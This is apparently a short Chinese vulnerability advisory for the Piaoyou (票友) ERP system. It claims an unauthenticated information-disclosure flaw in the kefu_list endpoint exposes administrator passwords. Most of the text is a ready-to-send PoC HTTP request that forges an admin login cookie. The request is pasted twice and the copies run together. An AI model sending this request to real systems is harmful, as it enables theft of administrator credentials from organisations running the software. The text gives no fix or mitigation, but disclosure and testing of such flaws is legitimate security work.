漏洞描述
票友ERP系统存在信息泄露漏洞,未经授权的攻击者可通过该漏洞获取管理员账号密码信息。
票友ERP系统kefu_list存在信息泄露漏洞
PoC代码
GET /json_db/kefu_list.aspx?
stype=0&_search=false&nd=1751246532981&rows=25&page=1&sidx=id&sord=asc HTTP/1.1
Host:
Cookie: pyerpcookie=loginname=adminGET /json_db/kefu_list.aspx?
stype=0&_search=false&nd=1751246532981&rows=25&page=1&sidx=id&sord=asc HTTP/1.1
Host:
Cookie: pyerpcookie=loginname=admin